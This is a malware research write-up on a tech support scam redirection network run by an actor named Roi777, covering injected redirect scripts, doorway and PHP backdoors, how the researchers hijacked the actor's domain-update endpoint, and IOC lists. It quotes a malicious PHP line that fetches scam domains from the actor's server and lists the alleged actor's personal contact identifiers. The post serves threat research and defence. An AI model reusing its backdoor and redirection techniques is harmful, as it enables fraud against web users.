<li>hxxp://kodmax.com/wp-content/plugins/twitter-widget-pro/lib/<INFECTED.PHP></INFECTED.PHP></li>
<li>hxxp://www.katiatenti.com/wp-content/plugins/sydney-toolbox/inc/<INFECTED.PHP></INFECTED.PHP></li>
<li>hxxp://emarketing-immobilier.com/wp-content/plugins/gotmls/safe-load/<INFECTED.PHP></INFECTED.PHP></li>
<li>hxxp://stefanialeto.it/wp-content/plugins/flexible-lightbox/css/<INFECTED.PHP></INFECTED.PHP></li>
</ul>
<p>Once visited, those PHP files will set a cookie and redirect the user to the TSS landing page with the parameter “<strong>/index/?2101505838590</strong>” without further verification:</p>
<p><img src="https://i.imgur.com/3aKQwEO.png" alt="Kodmax redirection" class="center" /></p>
<p>Clearly, those four (4) website redirecting users have been hacked. One of them has the directory listing enabled, allowing us to see that the malicious file has been put there on 2017-11-17. It is probably at this date that this campaign started. Also, as <a href="http://malware-traffic-analysis.net/2018/01/06/index.html">another malware researcher did</a>, we can search for some of the unique constants in the javascript file on Google and find more than 8000 indexed websites that are apparently infected with this script:</p>
<p><img src="https://i.imgur.com/eGxb4aO.png" alt="Google Query" class="center" /></p>
<p>Sometimes, the script gets injected multiple times within a page or in a way that it doesn’t work. For example, this website got defaced with the badly injected javascript:</p>
<p><img src="https://i.imgur.com/Z4ubsSk.png" alt="Basham Radio" class="center" /></p>
<p>We went one step further when we realized that those malicious PHP files redirecting the users were logging every queries received in a .txt file accessible on the same server. For each redirected user, we had the timestamp of the query, their IP address, referrer and their user-agent. We then downloaded the logs for each of those 4 websites to index them in a database. To consider a request unique, we looked at the hash of: The <strong>timestamp</strong> of the request + the victim <strong>IP</strong> + the <strong>referer</strong> domain name.</p>
<p>This allowed us to determine that more than 7400 unique redirections happened since february 20.</p>
<p><img src="https://i.imgur.com/QJI4Zsk.png" alt="chart" class="center" />
Country of redirected users for the ‘Plugin’ redirection</p>
<p>The campaign is still going on so the numbers are constantly increasing. We also looked at unique domains in the referer field. We spotted ~1294 different domains redirected those users. The ones that redirected the most users are:</p>
<ul>
<li><code class="highlighter-rouge">Revista.academiamaestre.es</code> (5678 redirections)</li>
<li><code class="highlighter-rouge">admission.covenantuniversity.edu.ng</code> (1947 redirections)</li>
<li><code class="highlighter-rouge">blog.apartmentfinder.com</code> (1844 redirections)</li>
<li><code class="highlighter-rouge">rockthedirt.com</code> (1566 redirections)</li>
</ul>
<h2 id="location-for-expert-redirection">Location For Expert Redirection</h2>
<p>Some website are redirecting users to TSS domains with the following path: “<strong>/index/?1641501770611</strong>”. It is the result of running this malicious javascript:</p>
<p><img src="https://i.imgur.com/ASZpCeM.png" alt="Expert Redirection" class="center" /></p>
<p>After deobfuscation, the code becomes readable and we can see the redirection:</p>
<p><img src="https://i.imgur.com/vUJ6wp5.png" alt="Expert Redirection 2" class="center" /></p>
<p>The client will query the URL at <code class="highlighter-rouge">hxxp://ads.locationforexpert.com/b.php</code> (the filename often changes). The remote script then returns the URL where the user will be redirected.</p>
<h2 id="containerru-redirection">ContainerRU Redirection</h2>
<p><img src="https://i.imgur.com/C00n1oY.jpg" alt="ContainerRU Redirection" class="center" /></p>
<p>This campaign generates about 335 redirections / hour. Website <code class="highlighter-rouge">www.cursosortografia.com</code> was responsible for 158 redirections (6%) and <code class="highlighter-rouge">cursosaprende.com</code> for 142 redirections (5%).</p>
<p>This Javascript found was obfuscated by hiding the content of the code in a fake image encoded in base64:</p>
<p><img src="https://i.imgur.com/yNPkqol.png" alt="containerRU TSS" class="center" /></p>
<p>After deobfuscation, we can analyse the code:</p>
<p><img src="https://i.imgur.com/Pqmk1VD.png" alt="ContainerRU - deobfuscated" class="center" /></p>
<p>The script will verify If the navigator of the user is either Chrome or Firefox. In this scenario, the user is redirected to an URL serving a payload. If the browser is Internet Explorer, the user will be redirected to the following URL: <code class="highlighter-rouge">hxxp://div-class-container.ru/index5.php</code>, which will in turn redirect the user with an HTTP 301 to the TSS page with the parameter “<strong>/index/?801492446045</strong>”:</p>
<p><img src="https://i.imgur.com/Tb8Q9bl.png" alt="ContaierRU redirection" class="center" /></p>
<p>In all cases, if the domain name of the actual infected website contains “edu”, “gov” or “mil”, the script will not redirect the user.
The IP address where this redirecting script is hosted (193.201.227.193) <a href="https://blog.sucuri.net/2017/10/cryptominers-on-hacked-sites-part-2.html">has been linked</a> to unwanted redirects in late 2017.</p>
<h2 id="doorways-redirections">Doorways redirections</h2>
<p><em>What is a Doorway?</em></p>
<p>A <a href="https://kb.sucuri.net/malware/signatures/php.spam-seo.doorway-gen.001">doorway script</a> is usually an obfuscated PHP script that can trick search engines crawler to perform black hat SEO by modifying the content of a website to specific combination of keywords. However, the one used in this campaign is pretty advanced and allows the owner to basically do whatever he wants with the infected websites, such as injecting content. We discovered that he will often ‘upgrade’ those doorway scripts to PHP backdoors.</p>
<p>We also saw other prolific campaigns for which we don’t have the redirections scripts. For instance, the one generating the largest amount of traffic (URLs are recognizable with “<strong>/index/?1051496225880</strong>”) has been responsible for 43503 redirections over the 8 hours period (5437 redirections per hour) and represents 40% of the overwall traffic seen:</p>
<p><img src="https://i.imgur.com/FlLX2u1.jpg" alt="Top Campaigns seen" class="center" /></p>
<p>The websites who redirected users for this largest campaign is mostly <code class="highlighter-rouge">archive-s54.info</code> with 18331 redirects, followed by:</p>
<ul>
<li><code class="highlighter-rouge">sharesix.com</code> (947 redirections)</li>
<li><code class="highlighter-rouge">www.gowatchfreemovies.to</code> (919 redirections)</li>
<li><code class="highlighter-rouge">myilifestyle.com</code> (871 redirections)</li>
<li><code class="highlighter-rouge">www.primewire.ag</code> (862 redirections)</li>
<li><code class="highlighter-rouge">Sharerepo.com</code> (856 redirections)</li>
<li><code class="highlighter-rouge">www.fertilitychef.com</code> (820 redirections)</li>
<li><code class="highlighter-rouge">Filenuke.com</code> (800 redirections)</li>
</ul>
<p>We believe that those website have the <a href="https://kb.sucuri.net/malware/signatures/php.spam-seo.doorway-gen.001">doorways</a> backdoor installed. Most of them are configured to get to latest TSS URL to :
<code class="highlighter-rouge">hxxp://fped8.org/doorways/settings_v2.php?clientid=<ID>&ineednewurltoredirect=yes</code></p>
<p>This website will return the appropriate domain to redirect the user:</p>
<p><img src="https://i.imgur.com/ubeade1.png" alt="Doorway redirection" class="center" /></p>
<h2 id="other-redirections">Other redirections</h2>
<p>By monitoring the backend servers, we discovered that the same infrastructure also serves for other malicious activities.</p>
<h3 id="chrome-plugin">Chrome plugin</h3>
<p>We’ve also observed some redirections chains from malvertising leading to fake chrome extensions. For example, one customer of <a href="https://www.popads.net/">PopAds</a>, whose account is now banned, was redirecting clients to a TDS system at this URL: <code class="highlighter-rouge">hxxp://162.244.35.210/newantikas/?cP65FB</code>. After multiple redirections, the users landed on the website <code class="highlighter-rouge">livelifeo.top</code>, which resolved to IPs belonging to the back-end server we were monitoring:</p>
<p><img src="https://i.imgur.com/Uimg42b.png" alt="malicious-fake-chrome-addon" class="center" /></p>
<p>After more digging into domains associated to the same scam, we also found another version of the landing page that tried to trick users to those malicious Chrome extensions:</p>
<p><img src="https://i.imgur.com/dccmI5W.png" alt="Chrome Plugin" class="center" /></p>
<p>The back-end server, owned by <strong>Roi777</strong> was also responsible for the traffic generated by those malicious Chrome extensions.</p>
<p>We also found a control panel that allowed them to categorize the status of those applications. Fortunately for us, the developer had no idea how to properly protect this panel. The password verification function was implemented in client-side Javascript.</p>
<p><img src="https://i.imgur.com/IYyxWw0.jpg" alt="Plugin panel" class="center" /></p>
<p>We later found those Chrome extension in the Chrome Store infected and heavily obfuscated. The purpose of them was to randomly redirect the user while browsing. The page where users get redirected can vary from nuisance advertisement to fake software installation page and TSS.</p>
<p>Anyhow, those addons are no longer being pushed and the page is no longer being updated. The actors probably moved to something else.</p>
<h3 id="pinterest">Pinterest</h3>
<p>We also found some links to TSS on Pinterest:
<code class="highlighter-rouge">jeanclementcom.us</code> has been registered with the email address <strong>opel73rus@gmail.com</strong>, like many other domains name hosted on <strong>Roi777</strong> infrastructure.</p>
<p><img src="https://i.imgur.com/x17uqXo.png" alt="Pinterest" class="center" /></p>
<h3 id="android-applications">Android applications</h3>
<p>Malicious APKs are also found to be served when browsing to a domain hosted on his infrastructure : <code class="highlighter-rouge">fped8.org/mob/antivirus/1/en/index.php</code></p>
<p><img src="https://i.imgur.com/i7OJs7x.png" alt="Virus detected" class="center" /></p>
<p><a href="https://www.virustotal.com/#/file/3cec545922252e0cfc3e0149a63d9df73b0f7f89aa0782a3c7ad16844f804c66/details">The payload</a> is then downloaded from: <code class="highlighter-rouge">fped8.org/mob/antivirus/1/en/downloader.php</code>. Once installed, the application will contact another domain hosted on the same server (<code class="highlighter-rouge">hxxp://alija.xyz/panel/</code>).</p>
<p>This APK has the ability to redirect users to fraudulent ads and potentially TSS.</p>
<h2 id="analysis-of-the-backend-traffic">Analysis of the backend traffic</h2>
<p>By monitoring differents TDS and back-end server serving those TSS campaigns, we saw a lot of different traffic type linked to differents malicious activities.Not only is this actor involved in the selling of fake software and redirecting to scams, but also in severals webshells and doorways backdoors, allowing him to control a vast network of compromised websites. This section take a look at those differents access methods and how they are leveraged.</p>
<h3 id="uses-of-scams-domains">Uses of scams domains</h3>
<p>We observed TSS domains usually having the TLD .TK changing more than 100 times per day for this campaign. In the last 30 days only, we were able to log 2912 of those domains. Here is the most common IPs where they are pointing:</p>
<ul>
<li>999 of them (35%) are resolving to <strong>204.155.28.5</strong> (King Servers)</li>
<li>878 of them (30%) are resolving to <strong>185.159.83.47</strong> (King Servers)</li>
<li>162 of them (5%) are resolving to <strong>54.36.151.52</strong> (OVH)</li>
</ul>
<h3 id="php-backdoor">PHP Backdoor</h3>
<p>We discovered that many “bots” were reporting to the back-end server belonging to <strong>Roi777</strong>. In fact we account for a total of 1562 infected websites reporting to his server. There are two types of backdoors that report to the infrastructure we monitored.</p>
<p>The first one being <a href="https://kb.sucuri.net/malware/signatures/php.hacktool.doorway-gen.001">Doorways</a>.We counted 386 differents website constantly asking the server for content to inject.</p>
<p>For the other type of backdoor, we observed 1176 differents domains infected reporting to the server, also asking for content to inject. Here is some stats about the CMS they used:</p>
<ul>
<li>WordPress : 211</li>
<li>OpenCart: 41</li>
<li>Joomla: 19</li>
<li>Magento: 1</li>
<li>Unknown: 904</li>
</ul>
<p>This backdoor is described in the next section.</p>
<h3 id="doorways-to-php-backdoor">Doorways to PHP backdoor</h3>
<p>The Doorways have the capability to fetch for instruction and code to execute. We noticed that many of them were querying <code class="highlighter-rouge">fped8.org/doorways/settings_v2.php</code>. This URL, when queried with the good parameters, returns code to execute. This allowed us to saw how they can deploy PHP shell through their Doorways:</p>
<p><img src="https://i.imgur.com/Y9ISbDW.png" alt="doorways_to_php" class="center" /></p>
<p>The content returned contains the backdoor encoded in base64, rot13 and base64 again. After de-obfuscation, we got this code:</p>
<p><img src="https://i.imgur.com/E3xjKnG.png" alt="shell" class="center" /></p>
<p>The first part of this malicious PHP script will query <code class="highlighter-rouge">hxxp://kost8med.org/get.php</code> with the user-agent of the current visitor requesting the page and it’s IP address. If a content is returned, it will be outputted in the content of the page. That said, the owner of the backdoor can inject any code they want into the page. Again, <code class="highlighter-rouge">kost8med.org</code> is resolving to <strong>162.244.35.30</strong> which is an IP address belonging to <strong>Roi777</strong>.</p>
<p>The second part of the script contains a backdoor function executing every request received in the “c” field of the POST parameter of the request if the parameter “p” is also set with the correct password.</p>
<p>The password validation is done in a strange way. The received parameter “p” will be hashed twice before being compared to the hardcoded MD5 hash. However both the idea and the implementation is deficient here, because hashing twice is not more secure in this situation and the comparison is done with “==” instead of “===” (strict comparison), plus the fact that MD5 is no longer considered secure.</p>
<p><img src="https://media.giphy.com/media/TEmi096kezejdtyAjT/giphy.gif" alt="giphy.gif" class="center" /></p>
<p>It took less than 30 mins to crack the actual password allowing the control of those backdoors. We must say that the speciality of those guys is clearly not security, but rather the opposite.</p>
<p>On a Wordpress installation, this backdoor is usually found in those files:</p>
<ul>
<li>wp-config.php</li>
<li>index.php</li>
<li>wp-blog-header.php</li>
<li>Footer.php</li>
</ul>
<p>We also found what looks like the administrator panel on the same server that they are reporting to:</p>
<p><img src="https://i.imgur.com/vhWVF6U.png" alt="panel" class="center" /></p>
<h3 id="other-backdoors">Other backdoors</h3>
<p>Many of the websites that were infected by the original backdoor we were investigating on were also infected with other PHP malicious scripts. However, we don’t think those other scripts were linked to this campaign.</p>
<h3 id="infection-vector-plugin-that-is-hacked-infected-path">Infection vector (plugin that is hacked, infected path)</h3>
<p>It is hard to know for sure how those CMS has been infected. One thing we did notice on lot of them is that the malicious code was in the file <strong>footer.php</strong> of a WordPress plugins named Genesis. It turns out that this plugin was <a href="https://www.pluginvulnerabilities.com/2016/09/22/arbitrary-file-upload-vulnerability-in-genesis-simple-defaults/">known to be vulnerable</a> against Arbitrary File Upload in late 2016. However a lot of them have been exploited by other means, such as with other vulnerable plugins and passwords stealings / brute forcing.</p>
<h2 id="redirecting-the-traffic-flow-or-dethroning-the-king">Redirecting the traffic flow (or dethroning the king)</h2>
<p>By looking at requests sent to the back-end servers, we noticed curious GET requests among a the traffic. The GET requests in question were formatted like the following :
<code class="highlighter-rouge">hxxps://wowbelieves.us/tech_supportv2.php?update_domain=<Tech support Scam domain></code></p>
<p>The <strong>update_domain</strong> parameter immediately drew our attention, so we tried to do a query to the same PHP file with a domain under our control as the value of this parameter. Immediately, our server started receiving traffic.</p>
<p><img src="https://i.imgur.com/ckvCa8p.jpg" alt="image" class="center" /></p>
<p>So apparently, calls to this PHP file change to current domain published for TSS that the backdoors are relying on to redirect the users. In fact, we were able to change the domain returned by <code class="highlighter-rouge">roi777.com/domain.php</code>, where multiple backdoors are fetching the current TSS domain. As said before, those domains are changing more than 100 times a day, and we observed that they have a script calling <strong>/tech_supportv2.php</strong> frequently so users can be redirected to the latest domain. That said, when we changed the TSS domain to point to a domain under our control, it took only few minutes before their script updated it with the real TSS, overwriting ours at the same time. To keep the traffic going to our server, we then had to query multiple time per minute this webpage, and it sure worked.</p>
<p>After the initial 8 hours in which we had control of most of the traffic, they updated <strong><em>tech_supportv2.php</em></strong> and their script calling it so that the parameters expect were now the domain name to update, plus a key:
<code class="highlighter-rouge">hxxps://wowbelieves.us/tech_supportv2.php?update_domain=<Tech support Scam domain>&key=<Hash MD5></code></p>
<p>To fix the aberrant lack of security in their mechanism to update the current TSS domains, they added this key to the parameters so our previous requests weren’t working anymore.</p>
<p><img src="https://i.imgur.com/BYcu3rv.jpg" alt="playgame" class="center" /></p>
<p><em>What is this ‘key’ parameter ?</em></p>
<p>The key parameter was 32 characters long, so we immediately thought of an MD5 hash. We tried to hash the current domain to see if it was matching, but no luck. We also noticed that the ‘key’ value (or hash) was different for each TSS domain they were updating and we were able replay them without problem. Given this information, it looked like it they were probably using some sort of salting with the domain name before hashing it.</p>
<p>Knowing a part of the hashed value (the domain name), and giving their expertise in cryptography, we started a <a href="https://hashcat.net/wiki/doku.php?id=mask_attack">mask attack</a> locally with hashcat. It took us less than 10 seconds to reveal the salt used. The MD5 hash was the result of the domain name concatenated to the string: “<strong>ropl</strong>”. This allowed us to take the control back (on and off) of the traffic for another 7 hours. However, the stats used above for webshells and redirections are only based on the first 8 hours of collection.</p>
<p><img src="https://i.imgur.com/Zz2lBdZ.jpg" alt="captain" class="center" /></p>
<p>Note that we didn’t take advantage of the redirected traffic, we instead logged every request made and temporarily neutralized the campaigns by avoiding any redirections to malicious websites.</p>
<p>The first time we redirected the traffic, we collected more than 108700 requests (8 hours period).
The second attempt to redirect the traffic allowed us to log more than 55000 requests (6 hours).</p>
<p>By combining both data sets, we did some statistics:</p>
<p><img src="https://i.imgur.com/IJka9gV.png" alt="chart2" class="center" /></p>
<p>Every request made by IP <strong>89.108.105.13</strong> (Russia) was excluded from the graph because it generated by itself 48256 requests to <strong>/index/api.php</strong> and we believe that this traffic is generated by one of their server that control doorways on their infrastructure.</p>
<p>Here are the top 15 most seen websites in the referer field (probably infected websites):</p>
<p><img src="https://i.imgur.com/IVN8g6O.png" alt="domainstats" class="center" /></p>
<p>Here are the most seen user-agents in those requests:</p>
<p><img src="https://i.imgur.com/pL88qqf.png" alt="uastats" class="center" /></p>
<p>It’s interesting to note that a lot of requests were coming from <a href="https://kodi.tv/">Kodi</a> (Open Source Home Theater Software), followed by Internet Explorer browser.</p>
<h2 id="link-to-roi777">Link to Roi777</h2>
<p>Considering the variety of coding styles, providers, IPs used and infected websites, we believe that many actors are involved in the traffic redirection. However, it is clear that the one known as <strong>roi777</strong> has a central role in this whole scheme. As advertised on his website, he’s buying any type of traffic after all.</p>
<p><em>How does all of that links to Roi777 ?</em></p>
<p>Redirections chains explained above will not always redirect users to TSS. In fact, they are often filtering clients base on GeoIP and user-agent. When the traffic is unwanted for TSS, the redirection chain will often lead to : <code class="highlighter-rouge">hxxp://balans.shahterworld.org</code>.</p>
<p>The parameters passed to those requests is another indication that this campaign is lead by <strong><em>roi777</em></strong>: <br />
<code class="highlighter-rouge">hxxp://balans.shahterworld.org/?utm_medium=4c23b9fecf7dfd895dfe0da99e857f3bee8e9d42&utm_campaign=roi777_cloack</code></p>
<p>Also, almost all of the redirections scripts are either pointing directly to <code class="highlighter-rouge">roi777.com/domain.php</code> to fetch the latest domain or they are reporting to this same backend server, waiting for instruction.</p>
<p>We found an interesting discussion that happened on 06-01-2018 on this Russian forum[^1] involving the owner of the company <strong>Roi777</strong> (using the nickname <em>bagussusu</em>) and another actor (<em>azuluk</em>) providing him backdoors, doorways and other elements mean to increase the number of redirected users. You can read the <a href="https://malware.dontneedcoffee.com/images/blog/hosted/kotd/Russian Forum.pdf">translated conversation here</a>. In summary, we can learn that :</p>
<ul>
<li>They were involved in the traffic generated by some Chrome Extension</li>
<li>They are using Quiwi / WebMoney financial services to transfer money.</li>
<li>Their main offer is currently Tech Support Scam.</li>
<li><em>Bagussusu</em> is accepting a minimum trade of 1000 webshells and can convert them to Doorways</li>
<li><em>Azuluk</em> had 30GB of mail accounts+passwords ready to sell. 5 millions of those were corporate accounts</li>
<li><em>Bagussusu</em> is also using SPAM to increase the traffic.</li>
<li><em>Bagussusu</em> have some employees working for him (developers).</li>
<li>The return on investment is apparently better in France (people get scammed easier).</li>
<li><em>Azuluk</em> is using <a href="http://jako.tech">JakoDorgen</a> to create Doorways.</li>
<li>
<p><em>Bagussusu</em> recommands to fetch the latest TSS domain to his website with this PHP code:</p>
<p><code class="highlighter-rouge">$domain = file_get_contents('http://roi777.com/domain.php');</code></p>
</li>
<li>They also provide other interesting details such as the IP of the TDS</li>
</ul>
<h2 id="who-is-this-roi777-">Who is this “Roi777” ?</h2>
<p>Being a young adult living in Russia, you can also find him using the following identities:</p>
<ul>
<li>https://t.me/roi777Eng</li>
<li>Tipatop</li>
<li>ICQ #: 660-349-155</li>
<li>ICQ #: 380-046-929</li>
<li>Skype: live: compiknews</li>
<li>Jabber: BagusSusu@exploit.im</li>
<li>Telegram: @roi777Ru</li>
<li>compiknews@gmail.com</li>
<li>SocMaster</li>
</ul>
<p>This non-exhaustive list is some of the most common pseudonyms he uses online. He operates a company that does “Traffic Monetization”. We now know how this traffic is brought back to his network (by illegals means) and what it is for (fraud).</p>
<h2 id="roi777-website">Roi777 Website</h2>
<p>His official website advertises some Success stories !</p>
<p><img src="https://i.imgur.com/FpEJfaW.png" alt="Traffic Monetization" class="center" />
Success stories include traffic generated by Doorways</p>
<p>And there’s also a Keitaro TDS installed directly on <strong>/tds/</strong>:</p>
<p><img src="https://i.imgur.com/Us8LQCM.png" alt="Keitaro TDS" class="center" /></p>
<h2 id="iocs">IOCs:</h2>
<p>Most of the domains for domains used for scams are being resolved by <code class="highlighter-rouge">ns1.rakamakao.org</code> and <code class="highlighter-rouge">ns2.rakamakao.org</code> (195.245.113.186 & 195.245.113.187). The PowerAdmin administration tool they are using is accessible on the same servers:</p>
<p><img src="https://i.imgur.com/lW9vHIm.png" alt="poweradmin" class="center" /></p>
<table>
<thead>
<tr>
<th>Some of the domains:</th>
</tr>
</thead>
<tbody>
<tr>
<td><code class="highlighter-rouge">alija.xyz</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">fped8.org</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">wowbelieves.us</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">shahterworld.org</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">roi777.com</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">kost8med.org</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">picturesun.top</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">websun.top</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">apelsinnik.site</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">chooseok.top</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">anyads.top</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">49frankov.top</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">africangirlskillingit.top</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">africanprint.top</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">africanpygmyhedgehog.top</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">africanamerican.top</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">arbuz01.org</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">ava4.org</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">jessica1.org</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">crispyom.org</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">kir2great.us</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">selenapix.us</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">wowbirth.us</code></td>
</tr>
</tbody>
</table>
<p>Also, AS14576 <a href="https://threatreconblog.com/2017/02/05/kings-and-secrets-not-a-good-combo/">Bullet proof hoster: King Servers</a> doesn’t seems to host any legitimate services except of cyber-crime on their infrastructure.</p>
<table>
<thead>
<tr>
<th>IPs:</th>
</tr>
</thead>
<tbody>
<tr>
<td><code class="highlighter-rouge">204.155.28.5</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">54.36.180.110</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">54.36.151.52</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">89.108.105.13</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">185.159.83.48</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">185.159.83.47</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">190.2.132.198</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">162.244.34.20</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">162.244.35.21</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">162.244.35.30</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">162.244.35.33</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">162.244.35.35</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">162.244.35.36</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">162.244.35.54</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">162.244.35.55</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">162.244.35.234</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">195.245.113.187</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">195.245.113.186</code></td>
</tr>
</tbody>
</table>
<h2 id="conclusion">Conclusion</h2>
<p>By distributing fake applications, using underground malware distribution campaigns, and leveraging malvertisements, the actors behind the company <strong>Roi777</strong> are trying to get as much traffic as they can, by any means possible. They are well active and always willing to get more traffic redirected to their scams so they can increase their income.</p>
<p>The EITest campaign, in part responsible for the TSS redirections, is still active even if it is one of the oldest campaign running and the backend servers IP have previous been revealed.</p>
<p>[^1]https[://forum.exploit[.in/index.php?act=ST&f=75&t=134802&st=0)</p>AnonymousDisclaimer: This post is hosted here as a courtesy to the author who prefers to remain anonymous. MDNC was not involved in any way with this study. Introduction EITest is one of the longest malicious delivery campaigns that has continued to evolve. In the spring of 2017, it started redirecting Internet Explorer users to tech support scams in addition to the existing redirections with the fake Chrome fonts. We believe the tech support scam campaign we are describing in this post is one of the most widespread and well organized because it relies on several schemes in addition to EITest, such as traffic redirection using a distributed system infrastructure. Actors behind this campaign are generating hundreds of domains per day.The only purpose of those domains names is to redirect users to tech support scams or malicious websites. Highlights We were able to redirect a considerable amount of traffic destined to Tech Support Scam websites to a controlled infrastructure for a period of 8 hours. After they fixed the flaw that allowed us to do that, we were able to bypass the new protection in place to take control again of the traffic for another 6 hours. We discovered a network of bots controlled by a fraudulent Traffic Monetization company We’ve collected a list of 1562+1294 compromised websites responsible for the redirections of users to scams The actors are generating over 100 new domains each day to serve TSS via Freenom The scam The landing page sometimes changes, but always has the same goal: trying to take control of the browser so the user cannot close it, in hopes that they will panic and call the phone number for assistance. Tech support scammer (TSS) are sometimes changing the landing page to better abuse the browser. Anyhow, this is what the current landing page looks like. People that call those numbers will be told how to install a remote control software so the interlocutor can show Windows log events and services to the user, pretending that those are signs of an infected machine. The crooks will then offer a remote reparation service varying from $100 to $600. Look at different redirection mechanisms While analyzing the different ways for a user to be redirected to those scam support pages that try to hijack the browsers, we quickly documented multiple different redirection schemes using many different infrastructure. For this reason, we believe that many differents actors are responsible for sending traffic to the redirection network. Let’s begin by describing the most prolific methods of redirections. EITest Redirection EITest infected websites have the capability of injecting javascript in page upon loading. We can observe redirections to tech support scam (TSS) websites since 2017. The injection that occurs when the victim’s user-agent is IE, Edge or Firefox, is the following: This script will, after verifying that it is running in a real browser, set a cookie named “popundr” and redirect the user at a decoy URL, hxxp://checkalldir.bid/index/?MGjJPm in this case. Decoy domains injected resolve to IP 204.155.28.5, in a range belonging to KING-SERVERS (AS 14576). Since 2018-02-26, injected domains were resolving to IP 54.36.180.110 at OVH instead (AS16276). It later changed back to 162.244.35.33, where TSS domains are now pointing. This EITest campaign is generating ~1 new domain per day (usually with the TLD .bid). Those are easily recognizable by their patterns “/?{6 characters}” in the URL, but the pattern is changing about 4 times per day. The reason they are using a decoy URL and a specific pattern is so they can be routed through their Keitaro TDS (traffic distribution system). In fact, we can browse to the panel of this TDS by accessing it with the IP address at URN /admin: Routing requests to their TDS before landing on the final destination allows them to have better control of the traffic and manage multiple campaigns. They are also doing more filtering on who will be redirected through this URL. We know that they are verifying at least the user-agent of the requester before allowing any redirection. Here is what will happen when the victims get redirected to one of those domains: In this case, querying the decoy EITest URL with an user-agent set to “MSIE” was enough for the TDS to send a 302 redirection to the landing page: hxxp://coloured-canvas.tk/?number=800-803-1741 Crypper Redirection This campaign generates about 165 redirections / hour. Website luyengame.com was responsible for 904 redirections (68%). For this redirection, we were able to get our hands on the malicious PHP file that is responsible for the generation of the script that redirects users: The PHP code will start by hiding any errors from the output and get the user-agent and referer of the visitor. Prior to the creation of the javascript that will redirect the user, the code checks that the visitor is not a bot (crawler) and that the visitor is not on a mobile device. If those checks pass, it will fetch the current Tech Support Scam (TSS) domain hxxp://roi777.com/domain.php and append the path “/index/?2661511868997” to it. Finally, the function “redirectdd” is called with the created URL and the script will output with the latest domain that roi777.com provided: The script then sets a cookie “1561065164894_CRYPPER” and redirects the user with window.location. Although simple, this script is efficient enough to redirect many visitors. Biz Redirection This campaign generates about 1888 redirections / hour. Website myilifestyle.com was responsible for 1199 redirections (8%) and www.fertilitychef.com for 1091 (7%) of the redirections. This redirection is distinguishable with the added path to the TSS domain: “/index/?2171506271081”. The script will fetch another script from hxxp://5.45.67.97/1/jquery.js.php and run it, leading to a redirection: Plugin Redirection This campaign generates about 184 redirections / hour. Website Archive-s54.info was responsible for 119 redirections (8%). This campaign has malicious Javascript slightly obfuscated by using the “reverse string” function: There are a few variants of this script containing different URLs. By applying the reverse string function again on the string containing the malicious URL, we were able to identified all of them: hxxp://kodmax.com/wp-content/plugins/twitter-widget-pro/lib/ hxxp://www.katiatenti.com/wp-content/plugins/sydney-toolbox/inc/ hxxp://emarketing-immobilier.com/wp-content/plugins/gotmls/safe-load/ hxxp://stefanialeto.it/wp-content/plugins/flexible-lightbox/css/ Once visited, those PHP files will set a cookie and redirect the user to the TSS landing page with the parameter “/index/?2101505838590” without further verification: Clearly, those four (4) website redirecting users have been hacked. One of them has the directory listing enabled, allowing us to see that the malicious file has been put there on 2017-11-17. It is probably at this date that this campaign started. Also, as another malware researcher did, we can search for some of the unique constants in the javascript file on Google and find more than 8000 indexed websites that are apparently infected with this script: Sometimes, the script gets injected multiple times within a page or in a way that it doesn’t work. For example, this website got defaced with the badly injected javascript: We went one step further when we realized that those malicious PHP files redirecting the users were logging every queries received in a .txt file accessible on the same server. For each redirected user, we had the timestamp of the query, their IP address, referrer and their user-agent. We then downloaded the logs for each of those 4 websites to index them in a database. To consider a request unique, we looked at the hash of: The timestamp of the request + the victim IP + the referer domain name. This allowed us to determine that more than 7400 unique redirections happened since february 20. Country of redirected users for the ‘Plugin’ redirection The campaign is still going on so the numbers are constantly increasing. We also looked at unique domains in the referer field. We spotted ~1294 different domains redirected those users. The ones that redirected the most users are: Revista.academiamaestre.es (5678 redirections) admission.covenantuniversity.edu.ng (1947 redirections) blog.apartmentfinder.com (1844 redirections) rockthedirt.com (1566 redirections) Location For Expert Redirection Some website are redirecting users to TSS domains with the following path: “/index/?1641501770611”. It is the result of running this malicious javascript: After deobfuscation, the code becomes readable and we can see the redirection: The client will query the URL at hxxp://ads.locationforexpert.com/b.php (the filename often changes). The remote script then returns the URL where the user will be redirected. ContainerRU Redirection This campaign generates about 335 redirections / hour. Website www.cursosortografia.com was responsible for 158 redirections (6%) and cursosaprende.com for 142 redirections (5%). This Javascript found was obfuscated by hiding the content of the code in a fake image encoded in base64: After deobfuscation, 